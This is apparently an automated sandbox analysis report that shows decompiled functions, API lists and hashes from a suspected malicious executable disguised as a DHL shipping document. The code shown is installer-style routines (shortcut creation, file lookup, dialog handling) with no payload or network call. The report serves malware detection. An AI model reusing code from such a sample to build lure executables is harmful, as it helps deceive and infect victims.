                                                              Function 004021AA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 67%
                                                              			E004021AA() {
				signed int _t52;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t80;
				void* _t83;
				intOrPtr* _t91;
				signed int _t101;
				signed int _t105;
				void* _t107;

				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
				_t52 =  *(_t107 - 0x20);
				 *(_t107 - 0x50) = _t52 & 0x00000fff;
				_t101 = _t52 & 0x00008000;
				_t105 = _t52 >> 0x0000000c & 0x00000007;
				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
				if(E00405FAE( *((intOrPtr*)(_t107 - 0x44))) == 0) {
					E00402DA6(0x21);
				}
				_t56 = _t107 + 8;
				__imp__CoCreateInstance(0x4084e4, _t83, 1, 0x4084d4, _t56);
				if(_t56 < _t83) {
					L14:
					 *((intOrPtr*)(_t107 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t60 =  *((intOrPtr*)(_t107 + 8));
					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084f4, _t107 - 0x38);
					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
					if(_t61 >= _t83) {
						_t64 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
						if(_t101 == _t83) {
							_t80 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t80 + 0x24))(_t80, L"C:\\Users\\jones\\AppData\\Local\\Temp");
						}
						if(_t105 != _t83) {
							_t78 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
						}
						_t66 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
						if( *_t91 != _t83) {
							_t76 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
						}
						_t68 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
						_t70 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
							_t74 =  *((intOrPtr*)(_t107 - 0x38));
							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
						}
						_t72 =  *((intOrPtr*)(_t107 - 0x38));
						 *((intOrPtr*)( *_t72 + 8))(_t72);
					}
					_t62 =  *((intOrPtr*)(_t107 + 8));
					 *((intOrPtr*)( *_t62 + 8))(_t62);
					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
						_push(0xfffffff4);
					} else {
						goto L14;
					}
				}
				E00401423();
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t107 - 4));
				return 0;
			}






















                                                              0x004021b3
                                                              0x004021bd
                                                              0x004021c7
                                                              0x004021d1
                                                              0x004021dc
                                                              0x004021df
                                                              0x004021f9
                                                              0x004021fc
                                                              0x00402202
                                                              0x00402205
                                                              0x0040220f
                                                              0x00402213
                                                              0x00402213
                                                              0x00402218
                                                              0x00402229
                                                              0x00402231
                                                              0x004022e8
                                                              0x004022e8
                                                              0x004022ef
                                                              0x00402237
                                                              0x00402237
                                                              0x00402246
                                                              0x0040224a
                                                              0x0040224d
                                                              0x00402253
                                                              0x00402261
                                                              0x00402264
                                                              0x00402266
                                                              0x00402271
                                                              0x00402271
                                                              0x00402276
                                                              0x00402278
                                                              0x0040227f
                                                              0x0040227f
                                                              0x00402282
                                                              0x0040228b
                                                              0x0040228e
                                                              0x00402294
                                                              0x00402296
                                                              0x004022a0
                                                              0x004022a0
                                                              0x004022a3
                                                              0x004022ac
                                                              0x004022af
                                                              0x004022b8
                                                              0x004022be
                                                              0x004022c0
                                                              0x004022ce
                                                              0x004022ce
                                                              0x004022d1
                                                              0x004022d7
                                                              0x004022d7
                                                              0x004022da
                                                              0x004022e0
                                                              0x004022e6
                                                              0x004022fb
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x004022e6
                                                              0x004022f1
                                                              0x00402c2d
                                                              0x00402c39

                                                              APIs
                                                              • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229
                                                              Strings
                                                              • C:\Users\user\AppData\Local\Temp, xrefs: 00402269
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.325407828.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.325399231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325416433.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000047D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_DHL_SHIPPING_DOCUMENT.jbxd
                                                              Similarity
                                                              • API ID: CreateInstance
                                                              • String ID: C:\Users\user\AppData\Local\Temp
                                                              • API String ID: 542301482-47812868
                                                              • Opcode ID: 077b7362f6a1d4038be91bf7f4b9e5842d68daf9de23732b557fb751e09ce78c
                                                              • Instruction ID: f110e38d5ccd8909b9e85e2ea6b1342c5fae2602ce40754bea02e3b472428d32
                                                              • Opcode Fuzzy Hash: 077b7362f6a1d4038be91bf7f4b9e5842d68daf9de23732b557fb751e09ce78c
                                                              • Instruction Fuzzy Hash: BC411771A00209EFCF40DFE4C989E9D7BB5BF49304B20456AF505EB2D1DB799981CB94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0040290B Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 39%
                                                              			E0040290B(short __ebx, short* __edi) {
				void* _t21;

				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
					E004065AF( *((intOrPtr*)(_t21 - 0xc)), _t8);
					_push(_t21 - 0x2b0);
					_push(__edi);
					E00406668();
				} else {
					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
					 *__edi = __ebx;
					 *((intOrPtr*)(_t21 - 4)) = 1;
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}




                                                              0x00402923
                                                              0x0040293e
                                                              0x00402949
                                                              0x0040294a
                                                              0x00402a94
                                                              0x00402925
                                                              0x00402928
                                                              0x0040292b
                                                              0x0040292e
                                                              0x0040292e
                                                              0x00402c2d
                                                              0x00402c39

                                                              APIs
                                                              • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.325407828.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.325399231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325416433.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000047D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_DHL_SHIPPING_DOCUMENT.jbxd
                                                              Similarity
                                                              • API ID: FileFindFirst
                                                              • String ID:
                                                              • API String ID: 1974802433-0
                                                              • Opcode ID: b2f27a8a5f9b700f187602bb898c1293859530a573ae52e9df8ecc114fa703e5
                                                              • Instruction ID: b84bdfeecc4e8c0803ac0e71b8711fc90ef1d688bdc4be786e729a17b55638d3
                                                              • Opcode Fuzzy Hash: b2f27a8a5f9b700f187602bb898c1293859530a573ae52e9df8ecc114fa703e5
                                                              • Instruction Fuzzy Hash: 47F05E71A04105EBDB01DBB4EE49AAEB378EF14314F60457BE101F21D0E7B88E529B29
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00405031 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 96%
                                                              			E00405031(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed char* _v32;
				int _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t198;
				intOrPtr _t201;
				long _t207;
				signed int _t211;
				signed int _t222;
				void* _t225;
				void* _t226;
				int _t232;
				long _t237;
				long _t238;
				signed int _t239;
				signed int _t245;
				signed int _t247;
				signed char _t248;
				signed char _t254;
				void* _t258;
				void* _t260;
				signed char* _t278;
				signed char _t279;
				long _t284;
				struct HWND__* _t291;
				signed int* _t292;
				int _t293;
				long _t294;
				signed int _t295;
				void* _t297;
				long _t298;
				int _t299;
				signed int _t300;
				signed int _t303;
				signed int _t311;
				signed char* _t319;
				int _t324;
				void* _t326;

				_t291 = _a4;
				_v12 = GetDlgItem(_t291, 0x3f9);
				_v8 = GetDlgItem(_t291, 0x408);
				_t326 = SendMessageW;
				_v24 =  *0x42a288;
				_v28 =  *0x42a270 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t301 = _a16;
					} else {
						_a12 = 0;
						_t301 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t301;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
							if(( *0x42a279 & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t237 = _v16;
									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
									}
									_t238 = _v16;
									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
										_t301 = _v24;
										_t239 =  *(_t238 + 0x5c);
										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
										} else {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t301 = 0 | _a8 != 0x00000413;
								_t245 = E00404F7F(_v8, _a8 != 0x413);
								_t295 = _t245;
								if(_t295 >= 0) {
									_t94 = _v24 + 8; // 0x8
									_t301 = _t245 * 0x818 + _t94;
									_t247 =  *_t301;
									if((_t247 & 0x00000010) == 0) {
										if((_t247 & 0x00000040) == 0) {
											_t248 = _t247 ^ 0x00000001;
										} else {
											_t254 = _t247 ^ 0x00000080;
											if(_t254 >= 0) {
												_t248 = _t254 & 0x000000fe;
											} else {
												_t248 = _t254 | 0x00000001;
											}
										}
										 *_t301 = _t248;
										E0040117D(_t295);
										_a12 = _t295 + 1;
										_a16 =  !( *0x42a278) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t301 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageW(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t225 =  *0x42372c;
								if(_t225 != 0) {
									ImageList_Destroy(_t225);
								}
								_t226 =  *0x423740;
								if(_t226 != 0) {
									GlobalFree(_t226);
								}
								 *0x42372c = 0;
								 *0x423740 = 0;
								 *0x42a2c0 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x42a279 & 0x00000001) != 0) {
									_t324 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t324);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
								}
								goto L93;
							} else {
								E004011EF(_t301, 0, 0);
								_t198 = _a12;
								if(_t198 != 0) {
									if(_t198 != 0xffffffff) {
										_t198 = _t198 - 1;
									}
									_push(_t198);
									_push(8);
									E00404FFF();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t301, 0, 0);
									_v36 =  *0x423740;
									_t201 =  *0x42a288;
									_v64 = 0xf030;
									_v24 = 0;
									if( *0x42a28c <= 0) {
										L86:
										if( *0x42a31e == 0x400) {
											InvalidateRect(_v8, 0, 1);
										}
										if( *((intOrPtr*)( *0x42923c + 0x10)) != 0) {
											E00404F3A(0x3ff, 0xfffffffb, E00404F52(5));
										}
										goto L90;
									}
									_t292 = _t201 + 8;
									do {
										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
										if(_t207 != 0) {
											_t303 =  *_t292;
											_v72 = _t207;
											_v76 = 8;
											if((_t303 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t292[4]);
												_t292[0] = _t292[0] & 0x000000fe;
											}
											if((_t303 & 0x00000040) == 0) {
												_t211 = (_t303 & 0x00000001) + 1;
												if((_t303 & 0x00000010) != 0) {
													_t211 = _t211 + 3;
												}
											} else {
												_t211 = 3;
											}
											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageW(_v8, 0x113f, 0,  &_v76);
										}
										_v24 = _v24 + 1;
										_t292 =  &(_t292[0x206]);
									} while (_v24 <  *0x42a28c);
									goto L86;
								} else {
									_t293 = E004012E2( *0x423740);
									E00401299(_t293);
									_t222 = 0;
									_t301 = 0;
									if(_t293 <= 0) {
										L74:
										SendMessageW(_v12, 0x14e, _t301, 0);
										_a16 = _t293;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
											_t301 = _t301 + 1;
										}
										_t222 = _t222 + 1;
									} while (_t222 < _t293);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t232 = SendMessageW(_v12, 0x147, 0, 0);
							if(_t232 == 0xffffffff) {
								goto L93;
							}
							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
								_t294 = 0x20;
							}
							E00401299(_t294);
							SendMessageW(_a4, 0x420, 0, _t294);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v36 = 0;
					_v20 = 2;
					 *0x42a2c0 = _t291;
					 *0x423740 = GlobalAlloc(0x40,  *0x42a28c << 2);
					_t258 = LoadImageW( *0x42a260, 0x6e, 0, 0, 0, 0);
					 *0x423734 =  *0x423734 | 0xffffffff;
					_t297 = _t258;
					 *0x42373c = SetWindowLongW(_v8, 0xfffffffc, E0040563E);
					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42372c = _t260;
					ImageList_AddMasked(_t260, _t297, 0xff00ff);
					SendMessageW(_v8, 0x1109, 2,  *0x42372c);
					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageW(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_t297);
					_t298 = 0;
					do {
						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
							if(_t298 != 0x20) {
								_v20 = 0;
							}
							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E004066A5(_t298, 0, _t326, 0, _t266)), _t298);
						}
						_t298 = _t298 + 1;
					} while (_t298 < 0x21);
					_t299 = _a16;
					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
					_push(0x15);
					E004045C4(_a4);
					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
					_push(0x16);
					E004045C4(_a4);
					_t300 = 0;
					_v16 = 0;
					if( *0x42a28c <= 0) {
						L19:
						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t319 = _v24 + 8;
						_v32 = _t319;
						do {
							_t278 =  &(_t319[0x10]);
							if( *_t278 != 0) {
								_v64 = _t278;
								_t279 =  *_t319;
								_v88 = _v16;
								_t311 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t311;
								_v44 = _t300;
								_v72 = _t279 & _t311;
								if((_t279 & 0x00000002) == 0) {
									if((_t279 & 0x00000004) == 0) {
										 *( *0x423740 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
									} else {
										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
									_v36 = 1;
									 *( *0x423740 + _t300 * 4) = _t284;
									_v16 =  *( *0x423740 + _t300 * 4);
								}
							}
							_t300 = _t300 + 1;
							_t319 =  &(_v32[0x818]);
							_v32 = _t319;
						} while (_t300 <  *0x42a28c);
						if(_v36 != 0) {
							L20:
							if(_v20 != 0) {
								E004045F9(_v8);
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E004045F9(_v12);
								L93:
								return E0040462B(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}


























































                                                              0x00405038
                                                              0x00405051
                                                              0x00405056
                                                              0x0040505e
                                                              0x00405064
                                                              0x0040507a
                                                              0x0040507d
                                                              0x004052a8
                                                              0x004052af
                                                              0x004052c3
                                                              0x004052b1
                                                              0x004052b3
                                                              0x004052b6
                                                              0x004052b7
                                                              0x004052be
                                                              0x004052be
                                                              0x004052cf
                                                              0x004052dd
                                                              0x004052e0
                                                              0x004052f6
                                                              0x0040536b
                                                              0x0040536e
                                                              0x00405370
                                                              0x0040537a
                                                              0x00405388
                                                              0x00405388
                                                              0x0040538a
                                                              0x00405394
                                                              0x0040539a
                                                              0x0040539d
                                                              0x004053a0
                                                              0x004053bb
                                                              0x004053a2
                                                              0x004053ac
                                                              0x004053ac
                                                              0x004053a0
                                                              0x00405394
                                                              0x00000000
                                                              0x0040536e
                                                              0x004052fb
                                                              0x00405306
                                                              0x0040530b
                                                              0x00405312
                                                              0x00405317
                                                              0x0040531b
                                                              0x00405326
                                                              0x00405326
                                                              0x0040532a
                                                              0x0040532e
                                                              0x00405332
                                                              0x00405345
                                                              0x00405334
                                                              0x00405334
                                                              0x0040533b
                                                              0x00405341
                                                              0x0040533d
                                                              0x0040533d
                                                              0x0040533d
                                                              0x0040533b
                                                              0x00405349
                                                              0x0040534b
                                                              0x0040535e
                                                              0x00405361
                                                              0x00405364
                                                              0x00405364
                                                              0x0040532e
                                                              0x00000000
                                                              0x0040531b
                                                              0x004052fd
                                                              0x00405304
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x004053be
                                                              0x004053be
                                                              0x004053c5
                                                              0x00405436
                                                              0x0040543e
                                                              0x00405446
                                                              0x00405446
                                                              0x0040544f
                                                              0x00405451
                                                              0x00405458
                                                              0x0040545b
                                                              0x0040545b
                                                              0x00405461
                                                              0x00405468
                                                              0x0040546b
                                                              0x0040546b
                                                              0x00405471
                                                              0x00405477
                                                              0x0040547d
                                                              0x0040547d
                                                              0x0040548a
                                                              0x004055eb
                                                              0x004055f2
                                                              0x0040560f
                                                              0x00405615
                                                              0x00405627
                                                              0x00405627
                                                              0x00000000
                                                              0x00405490
                                                              0x00405492
                                                              0x00405497
                                                              0x0040549c
                                                              0x004054a1
                                                              0x004054a3
                                                              0x004054a3
                                                              0x004054a4
                                                              0x004054a5
                                                              0x004054a7
                                                              0x004054a7
                                                              0x004054af
                                                              0x004054f0
                                                              0x004054f2
                                                              0x00405502
                                                              0x00405505
                                                              0x0040550a
                                                              0x00405511
                                                              0x00405514
                                                              0x004055b6
                                                              0x004055bf
                                                              0x004055c7
                                                              0x004055c7
                                                              0x004055d5
                                                              0x004055e6
                                                              0x004055e6
                                                              0x00000000
                                                              0x004055d5
                                                              0x0040551a
                                                              0x0040551d
                                                              0x00405523
                                                              0x00405528
                                                              0x0040552a
                                                              0x0040552c
                                                              0x00405532
                                                              0x00405539
                                                              0x0040553e
                                                              0x00405545
                                                              0x00405548
                                                              0x00405548
                                                              0x0040554f
                                                              0x0040555b
                                                              0x0040555f
                                                              0x00405561
                                                              0x00405561
                                                              0x00405551
                                                              0x00405553
                                                              0x00405553
                                                              0x00405581
                                                              0x0040558d
                                                              0x0040559c
                                                              0x0040559c
                                                              0x0040559e
                                                              0x004055a1
                                                              0x004055aa
                                                              0x00000000
                                                              0x004054b1
                                                              0x004054bc
                                                              0x004054bf
                                                              0x004054c4
                                                              0x004054c6
                                                              0x004054ca
                                                              0x004054da
                                                              0x004054e4
                                                              0x004054e6
                                                              0x004054e9
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x004054cc
                                                              0x004054cc
                                                              0x004054d2
                                                              0x004054d4
                                                              0x004054d4
                                                              0x004054d5
                                                              0x004054d6
                                                              0x00000000
                                                              0x004054cc
                                                              0x004054af
                                                              0x0040548a
                                                              0x004053cd
                                                              0x00000000
                                                              0x004053e3
                                                              0x004053ed
                                                              0x004053f2
                                                              0x00000000
                                                              0x00000000
                                                              0x00405404
                                                              0x00405409
                                                              0x00405415
                                                              0x00405415
                                                              0x00405417
                                                              0x00405426
                                                              0x00405428
                                                              0x0040542c
                                                              0x0040542f
                                                              0x00000000
                                                              0x0040542f
                                                              0x004053cd
                                                              0x00405083
                                                              0x00405088
                                                              0x00405091
                                                              0x00405098
                                                              0x004050aa
                                                              0x004050b5
                                                              0x004050bb
                                                              0x004050c9
                                                              0x004050dd
                                                              0x004050e2
                                                              0x004050ef
                                                              0x004050f4
                                                              0x0040510a
                                                              0x0040511b
                                                              0x00405128
                                                              0x00405128
                                                              0x0040512b
                                                              0x00405131
                                                              0x00405133
                                                              0x00405136
                                                              0x0040513b
                                                              0x00405140
                                                              0x00405142
                                                              0x00405142
                                                              0x00405162
                                                              0x00405162
                                                              0x00405164
                                                              0x00405165
                                                              0x0040516a
                                                              0x00405170
                                                              0x00405174
                                                              0x00405179
                                                              0x00405181
                                                              0x00405185
                                                              0x0040518a
                                                              0x0040518f
                                                              0x00405197
                                                              0x0040519a
                                                              0x0040526a
                                                              0x0040527d
                                                              0x00000000
                                                              0x004051a0
                                                              0x004051a3
                                                              0x004051a6
                                                              0x004051a9
                                                              0x004051a9
                                                              0x004051af
                                                              0x004051b8
                                                              0x004051bb
                                                              0x004051bf
                                                              0x004051c2
                                                              0x004051c5
                                                              0x004051ce
                                                              0x004051d7
                                                              0x004051da
                                                              0x004051dd
                                                              0x004051e0
                                                              0x0040521e
                                                              0x00405249
                                                              0x00405220
                                                              0x0040522f
                                                              0x0040522f
                                                              0x004051e2
                                                              0x004051e5
                                                              0x004051f3
                                                              0x004051fd
                                                              0x00405205
                                                              0x0040520c
                                                              0x00405217
                                                              0x00405217
                                                              0x004051e0
                                                              0x0040524f
                                                              0x00405250
                                                              0x0040525c
                                                              0x0040525c
                                                              0x00405268
                                                              0x00405283
                                                              0x00405286
                                                              0x004052a3
                                                              0x00000000
                                                              0x00405288
                                                              0x0040528d
                                                              0x00405296
                                                              0x00405629
                                                              0x0040563b
                                                              0x0040563b
                                                              0x00405286
                                                              0x00000000
                                                              0x00405268
                                                              0x0040519a

                                                              APIs
                                                              • GetDlgItem.USER32 ref: 00405049
                                                              • GetDlgItem.USER32 ref: 00405054
                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 0040509E
                                                              • LoadImageW.USER32 ref: 004050B5
                                                              • SetWindowLongW.USER32 ref: 004050CE
                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004050E2
                                                              • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004050F4
                                                              • SendMessageW.USER32(?,00001109,00000002), ref: 0040510A
                                                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405116
                                                              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405128
                                                              • DeleteObject.GDI32(00000000), ref: 0040512B
                                                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405156
                                                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405162
                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 004051FD
                                                              • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040522D
                                                                • Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405241
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0040526F
                                                              • SetWindowLongW.USER32 ref: 0040527D
                                                              • ShowWindow.USER32(?,00000005), ref: 0040528D
                                                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405388
                                                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004053ED
                                                              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405402
                                                              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405426
                                                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405446
                                                              • ImageList_Destroy.COMCTL32(?), ref: 0040545B
                                                              • GlobalFree.KERNEL32 ref: 0040546B
                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004054E4
                                                              • SendMessageW.USER32(?,00001102,?,?), ref: 0040558D
                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040559C
                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 004055C7
                                                              • ShowWindow.USER32(?,00000000), ref: 00405615
                                                              • GetDlgItem.USER32 ref: 00405620
                                                              • ShowWindow.USER32(00000000), ref: 00405627
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.325407828.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.325399231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325416433.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
